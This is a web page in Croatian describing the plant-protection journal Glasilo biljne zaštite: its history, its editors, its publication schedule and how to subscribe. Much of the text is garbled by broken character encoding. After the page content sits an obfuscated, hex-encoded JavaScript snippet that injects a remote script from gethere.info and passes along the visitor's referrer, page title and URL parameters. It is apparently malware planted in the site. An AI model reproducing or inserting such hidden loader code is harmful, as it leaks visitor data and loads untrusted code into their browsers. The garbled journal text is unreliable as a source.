Glasilo biljne zaštite

H rvatsko druA?tvo biljne zaA?tite osnovano je 27. listopada 2000. StruA?njaci prisutni na osnivaA?koj skupA?tini HDBZ smatrali su prijelaz iz Sekcije za zaA?titu bilja DruA?tva agronoma Hrvatske u Hrvatsko druA?tvo biljne zaA?tite (HDBZ) kvalitativnom promjenom. Tome je pridonijela A?injenica A?to su se u novo osnovano DruA?tvo uA?lanili i struA?njaci koji se bave zaA?titom A?uma. Osnivanjem Hrvatskoga druA?tva biljne zaA?tite zacrtani su planovi. Jedna od obveza bila je i pokretanje glasila Hrvatskoga druA?tva za zaA?titu bilja, nazvanog GLASILO BILJNE ZAA�TITE. Kao A?to je Sekcija za zaA?titu bilja bila prethodnik Hrvatskoga druA?tva biljne zaA?tite, tako je i naA? A?asopis imao struA?ne prethodnike. A?asopis je kroz pedesetak godina mijenjao imena, ali urednik je uvijek bio akademik Milan Maceljski. Tiskanjem A?asopisa Glasilo biljne zaA?tite 2001. godine nastavila se svijetla tradicija zaA?tite bilja u Hrvatskoj u promicanju zajedniA?kih interesa za biljnu zaA?titu i unapreA�enje biljne zaA?tite u svim njezinim segmentima. Za glavnog i odgovornog urednika Glasila izabran je akademik Milan Maceljski i ostao je urednikom do br. 4/2007. godine, kada se osobno zahvalio na uredniA?tvu. Od tada je glavni urednik dr. sc. Bogdan CvjetkoviA� prof. emer. Glasilo biljne zaA?tite redovito izlazi, a jedini je A?asopis u Hrvatskoj koji objavljuje iskljuA?ivo znanstvene, pregledne radove i struA?ne i A?lanke iz podruA?ja biljnoga zdravstva.

Svake godine Glasilo zaA?tite bilja tiska dvobroj a�zPregled sredstava za zaA?titu bila u Hrvatskoja�?. Akademik M. Maceljski poA?eo je sastavljati takve prikaze daleke 1957. godine.

Jedan broj Glasila svake godine objavljuje teme iz zaA?tite neke poljoprivredne kulture od A?tetnih organizama. U ostalim brojevima objavljuju se A?lanci o A?tetnim organizmima i njihovom prepoznavanju, A?ivotnim ciklusima, ekologiji, simptomima, suzbijanju, integriranoj zaA?titi, karantenskim organizmima i zakonodavstvu. A?asopis donosi i druge teme u rubrikama: DruA?tvene vijesti (HDBZ), Iz rada CROCPA, Iz rada povjerenstva za jezik, IzvjeA?A�a sa skupova i druge obavijesti.

Glasilo biljne zaA?tite izlazi u A?est brojeva godiA?nje i objavljuje dodatak Zbornik saA?etaka “Seminara biljne zaA?tite”. Svi A?lanovi Hrvatskog druA?tva biljne zaA?tite primaju i A?asopis.

Radovi objavljeni u Glasilu biljne zaA?tite redovito se indeksiraju u sljedeA�im bazama podataka: CAB Abstracts (CAB INTERNATIONAL) i AGRICOLA. Rukopisi se recenziraju.

Prva godina izlaA?enja: 2001

UA?estalost izlaA?enja (godiA?nje): 6

Svi radovi objavljeni u Glasilu biljne zaA?tite mogu se u cjelosti pronaA�i na linku http://hrcak.srce.hr/glasilo-biljne-zastite

Pretplati se

Pretplati se na Glasilo Biljne ZaA?tite i postani A?lanom Hrvatskog DruA?tva Biljne ZaA?tite

Arhiva Glasila BIljne ZaA?tite

var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}